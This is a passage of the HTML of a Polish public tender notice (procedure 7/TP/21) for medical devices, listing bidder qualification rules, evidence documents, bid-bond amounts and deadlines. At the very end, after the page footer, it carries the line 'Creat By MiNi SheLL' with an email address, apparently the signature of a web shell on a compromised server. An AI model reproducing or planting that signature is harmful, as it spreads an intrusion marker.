gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> d)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni ten warunek jeśli wykaże należyte wykonanie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanie, co najmniej dwóch dostaw:<br/>d.1) dla Pakietu 1 – urządzeń medycznych typu ogrzewacze medyczne, <br/>d.2) dla Pakietu 2 – urządzeń medycznych,<br/>d.3) dla Pakietu 3 – urządzeń medycznych typu kolumna endoskopowa, <br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie.<br/>Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą „spełnia – nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdziale VI.1 SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wszyscy Wykonawcy wraz z ofertą: 1) Wypełnione i<br/>podpisane oświadczenie o braku podstaw do wykluczenia i spełnieniu warunków udziału w<br/>postępowaniu aktualne na dzień składania ofert – Załącznik nr 4 do SWZ (wzór oświadczenia)<br/>Wykonawca, którego oferta została najwyżej oceniona:<br/>Informacja z Krajowego Rejestru Karnego w zakresie:<br/>a)art. 108 ust. 1 pkt 1 i 2 ustawy Pzp<br/>b)art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,<br/>- sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>5) Oświadczenie wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - Załącznik nr 6 do SWZ<br/> Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; 7) Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>9) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie odnoszącym się do podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 3-6 ustawy Pzp oraz w zakresie podstaw wykluczenia wskazanych w art. 109 ust. 1 pkt 1, 4, 5 i 7 ustawy Pzp</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wszyscy Wykonawcy wraz z ofertą: 1) Wypełnione i<br/>podpisaneoświadczenie o braku podstaw do wykluczenia i spełnieniu warunków udziału w<br/>postępowaniu aktualne na dzień składania ofert – Załącznik nr 4 do SWZ (wzór oświadczenia) <br/>Wykonawca, którego oferta została najwyżej oceniona na wezwanie Zamawiającego składa w wyznaczonym terminie (nie krótszym niż 5 dni) aktualne na dzień złożenia podmiotowe środki dowodowe: - potwierdzające spełnianie warunku zdolności technicznej lub zawodowej w postaci: należytego wykonania, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywania, co najmniej dwóch dostaw:<br/>d.1) dla Pakietu 1 – urządzeń medycznych typu ogrzewacze medyczne,<br/>d.2) dla Pakietu 2 – urządzeń medycznych,<br/>d.3) dla Pakietu 3 – urządzeń medycznych typu kolumna endoskopowa,<br/><br/>w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie;<br/>Wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; wzór wykazu dostaw stanowi Załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wszyscy Wykonawcy wraz z ofertą:	Broszury, opisy, foldery, ulotki, materiały informacyjne producenta, fotografie, opisy techniczne lub dane katalogowe, które w jednoznaczny sposób potwierdzają, że oferowana dostawa spełnia wymagania opisane w Załącznik 3.1-3.3 do SWZ (dotyczy pakietu, na który Wykonawca składa ofertę). Parametry, których brakuje w kartach katalogowych, ulotkach, itp. mogą być potwierdzone oświadczeniem producenta <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Broszury, opisy, foldery, ulotki, materiały informacyjne producenta, fotografie, opisy techniczne lub dane katalogowe, które w jednoznaczny sposób potwierdzają, że oferowana dostawa spełnia wymagania opisane w Załącznik 3.1-3.3 do SWZ (dotyczy pakietu, na który Wykonawca składa ofertę). Parametry, których brakuje w kartach katalogowych, ulotkach, itp. mogą być potwierdzone oświadczeniem producenta <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 3.1. Przystępując do przetargu Wykonawca jest zobowiązany wnieść wadium w wysokości:<br/>Wysokość wadium dla całości zamówienia wynosi 7.350,00 zł (słownie: siedem tysięcy trzysta pięćdziesiąt złotych 00/100)<br/>Wysokość wadium dla poszczególnych części zamówienia:<br/>PAKIET	KWOTA WADIUM<br/>Pakiet 1	300,00 zł<br/>Pakiet 2	50,00 zł<br/>Pakiet 3	7 000,00 zł<br/>3.2 Wykonawca jest zobowiązany wnieść wadium przed upływem terminu składania ofert i utrzymać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.1 pkt. 2 i 3 oraz ust. 2. W przypadku składania oferty na kilka pakietów wysokość wadium sumuje się.<br/>3.3.W zależności od woli Wykonawcy wadium może być wnoszone w jednej lub kilku następujących formach:<br/>a/ pieniądzu - na następujący rachunek bankowy Zamawiającego: <br/>55 1020 1853 0000 9702 0094 4959<br/>z dopiskiem: „Wadium - postępowanie 7/TP/21”<br/>b/	gwarancjach bankowych,<br/>c/ gwarancjach ubezpieczeniowych,<br/>d/ poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz.U.2020.299).<br/>3.4. Wadium wnoszone w pieniądzu będzie skuteczne z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego wskazanym powyżej, przed upływem terminu składania ofert. <br/>3.5. W przypadku wniesienia wadium w formie poręczenia lub gwarancji powinno być ważne przez okres związania ofertą. Z treści takiego dokumentu wadialnego winno wynikać nieodwołalne, bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w przypadkach określonych w ustawie Pzp. Wraz z ofertą Wykonawca musi przesłać oryginał dokumentu wadialnego w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez Gwaranta (tj. przez wystawcę gwarancji/poręczenia), poprzez skompresowanie go wraz z plikami stanowiącymi ofertę do jednego pliku archiwum (ZIP).Wymóg ten nie dotyczy złożenia wadium w formie depeszy wygenerowanej w systemie SWIFT w rozumieniu prawa bankowego. <br/>3.6. Zamawiający nie dopuszcza złożenia skanu przedmiotowych dokumentów.<br/>3.7. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona.<br/>3.8. Wadium dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia może być wniesione przez jednego z tych Wykonawców, kilku z nich lub wszystkich łącznie.<br/>3.9. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia publicznego oferta winna zawierać ponadto: a) Oświadczenie o braku podstaw do<br/>wykluczenia i spełnianiu warunków udziału w postępowaniu, w którym każdy z<br/>Wykonawcówwykazuje brak podstaw do wykluczenia i spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału<br/>w postępowaniu,składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówieniapublicznego.Wzór oświadczenia stanowi Załącznik nr 3 do SWZ.b) Dokument<br/>pełnomocnictwa pełnomocnika występującego w imieniu podmiotów ubiegających się o wspólne<br/>wykonanie zamówienia w przypadku składania oferty wspólnej. Z treści pełnomocnictwa<br/>musząjednoznacznie wynikać czynności do wykonania, których pełnomocnik jest upoważniony<br/>oraz umocowanie do reprezentacji wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. 2.1. Oferty przedstawione przez dwa lub więcej podmiotów<br/>występujących wspólnie, będą musiały spełniać następujące wymagania: 2. 2 W przypadku<br/>złożenia oferty wspólnej, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu oudzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego. 2. 3 W przypadku Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia, oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków<br/>udziału w postępowaniu, w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie<br/>warunków udziału w postępowaniu, składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenie te wstępnie potwierdza spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do<br/>wykluczenia.Wymagane dokumenty potwierdzające brak podstaw do wykluczenia, w tym<br/>oświadczenie, o którym mowa w pkt. VI.1.1) SWZ, składa każdy z Wykonawców.2.4 Oferta<br/>będzie podpisana kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym w taki sposób, by wiązała prawnie wszystkich partnerów. 2. 5Wykonawcy składający<br/>wspólną ofertę, o których mowa w pkt. 2.1) ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy o zamówienie publiczne.2.6. Jeżeli oferta Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia zostanie wybrana-Zamawiający może zażądać - przed podpisaniem<br/>umowy - kopii umowy regulującej współpracę tych podmiotów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia prowadzony został w Dziale XIV SWZ (Projekt Umowy) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-11 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformazakupowa.pl (zwanej dalej „Platformą”) pod adresem: https://platformazakupowa.pl/pn/pcr_sopot na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-11 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Termin realizacji przedmiotu zamówienia publicznego: <br/>do 6 tygodni od dnia zawarcia umowy, z tym że: <br/>- dostawy drenów wykonywane będą w okresie 24 miesięcy od dnia zawarcia umowy (dotyczy Pakietu nr 3).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-02 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com